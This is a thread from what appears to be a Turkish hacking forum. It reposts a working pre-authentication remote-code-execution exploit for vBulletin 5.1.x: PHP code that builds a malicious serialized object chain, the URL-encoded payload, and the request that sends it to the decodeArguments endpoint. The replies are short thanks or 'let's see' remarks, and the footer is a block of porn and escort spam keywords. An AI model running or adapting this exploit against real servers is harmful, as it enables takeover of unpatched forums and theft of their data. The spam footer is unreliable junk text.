KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit
Konu : vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit - 28.11.2015, 10:15
Mesaj: #1

Kod:
# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
# Date: Nov 4th, 2015
# Exploit Author: hhjj
# Vendor Homepage: http://www.vbulletin.com/
# Version: 5.1.x
# Tested on: Debian
# CVE :
# I did not discover this exploit, leaked from the IoT.

# Build the object
php << 'eof'
<?php
class vB_Database {
       public $functions = array();

       public function __construct()
       {
               $this->functions['free_result'] = 'phpinfo';
       }
}

class vB_dB_Result {
       protected $db;
       protected $recordset;

       public function __construct()
       {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}

print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

#Then hit decodeArguments with your payload :
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

Helper, üyesi illegalizm | Private illegal Topluluk - Hack forum,Warez Scriptler forumlarına 29.06.2015 tarihinde katılmıştır.

WWW Alıntı ile Cevapla
Konu : vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit - 28.11.2015, 14:30
Mesaj: #2
bakak.

WWW Alıntı ile Cevapla
Konu : vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit - 28.11.2015, 17:52
Mesaj: #3
bakalım

WWW Alıntı ile Cevapla
Konu : vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit - 28.11.2015, 23:32
Mesaj: #4
Teşekkürler.

WWW Alıntı ile Cevapla
Konu : vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit - 01.12.2015, 01:11
Mesaj: #5
bakalım

Kardeş konu paylaşmak için paylaşma zaten bunların tümü exploit de var bunu anlat ki milletde faydalansın

(Son Düzenleme: 01.12.2015, 01:12, Düzenleyen: BH-80.)
WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno